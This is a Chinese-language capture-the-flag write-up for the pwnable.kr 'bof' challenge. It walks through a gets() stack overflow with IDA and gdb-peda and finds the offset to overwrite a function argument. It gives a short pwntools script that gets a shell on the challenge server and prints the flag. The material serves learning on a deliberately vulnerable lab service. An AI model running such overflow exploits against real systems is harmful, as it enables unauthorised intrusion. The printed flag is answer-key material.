pwnable.kr之bof
pwnable.kr 上的第三道题
0x00 bof分析
相关题目文件:https://github.com/Reshahar/BlogFile/tree/master/pwnable.kr-bof
使用IDA分析源代码,主要函数func
int __cdecl func(int a1)
{
char s; // [sp+1Ch] [bp-2Ch]@1
int v3; // [sp+3Ch] [bp-Ch]@1
v3 = *MK_FP(__GS__, 20);
puts("overflow me : ");
gets(&s);
if ( a1 == 0xCAFEBABE )
system("/bin/sh");
else
puts("Nah..");
return *MK_FP(__GS__, 20) ^ v3;
}
源代码也很简单,很明了,让a1等于0xCAFEBABE就直接执行shell,而a1是func的参数,参数是在栈上保存的,在之前输入的字符s存在溢出可以覆盖a1的值
首先确定a1的偏移,使用peda生成畸形字符串
gdb-peda$ pattern create 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
反编译找到func找到比较的地方,在比较的地方下断点
0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
.....
0x00000689 <+93>: ret
gdb-peda$ b *0x00000654
Breakpoint 1 at 0x654
gdb-peda$ r
Starting program: /root/D/stack overflow/pwnable.kr-bof/bof
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x654
可以看到程序直接结束的,我们在func开始的地方下断点,然后取消之前的断点
gdb-peda$ b func
Breakpoint 2 at 0x56555632
gdb-peda$ info b
Num Type Disp Enb Address What
1 breakpoint keep y 0x00000654
2 breakpoint keep y 0x56555632 <func+6>
gdb-peda$ delete 1
gdb-peda$ r
Starting program: /root/D/stack overflow/pwnable.kr-bof/bof
...
Breakpoint 2, 0x56555632 in func ()
gdb-peda$
gdb-peda$ disass func
Dump of assembler code for function func:
0x5655562c <+0>: push ebp
0x5655562d <+1>: mov ebp,esp
0x5655562f <+3>: sub esp,0x48
=> 0x56555632 <+6>: mov eax,gs:0x14
0x56555638 <+12>: mov DWORD PTR [ebp-0xc],eax
0x5655563b <+15>: xor eax,eax
0x5655563d <+17>: mov DWORD PTR [esp],0x5655578c
0x56555644 <+24>: call 0xf7e6fd00 <puts>
0x56555649 <+29>: lea eax,[ebp-0x2c]
0x5655564c <+32>: mov DWORD PTR [esp],eax
0x5655564f <+35>: call 0xf7e6f480 <gets>
0x56555654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe
0x5655565b <+47>: jne 0x5655566b <func+63>
0x5655565d <+49>: mov DWORD PTR [esp],0x5655579b
0x56555664 <+56>: call 0xf7e49360 <system>
0x56555669 <+61>: jmp 0x56555677 <func+75>
0x5655566b <+63>: mov DWORD PTR [esp],0x565557a3
0x56555672 <+70>: call 0xf7e6fd00 <puts>
0x56555677 <+75>: mov eax,DWORD PTR [ebp-0xc]
0x5655567a <+78>: xor eax,DWORD PTR gs:0x14
0x56555681 <+85>: je 0x56555688 <func+92>
0x56555683 <+87>: call 0xf7f05270 <__stack_chk_fail>
0x56555688 <+92>: leave
0x56555689 <+93>: ret
End of assembler dump.
gdb-peda$ b* 0x56555654
Breakpoint 3 at 0x56555654
gdb-peda$ c
Continuing.
overflow me :
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
....
Breakpoint 3, 0x56555654 in func ()
gdb-peda$ x/wx $ebp+0x8
0xffffd400: 0x41474141
gdb-peda$ pattern offset 0x41474141
1095188801 found at offset: 52
偏移确定了52,用pwntools直接写exp,如下
#filename:exp.py
#author:reshahar
from pwn import *
#p = process('./bof')
p = remote('pwnable.kr',9000)
sh = 'A'*52+p32(0xCAFEBABE)
p.send(sh)
p.interactive()
运行结果,拿下flag
root@kali:~/D/stack overflow/pwnable.kr-bof# python exp.py
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ id
$ id
uid=1008(bof) gid=1008(bof) groups=1008(bof)
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)
$
0x00 总结
做题要细心,失败和成功有时只有一丝差别
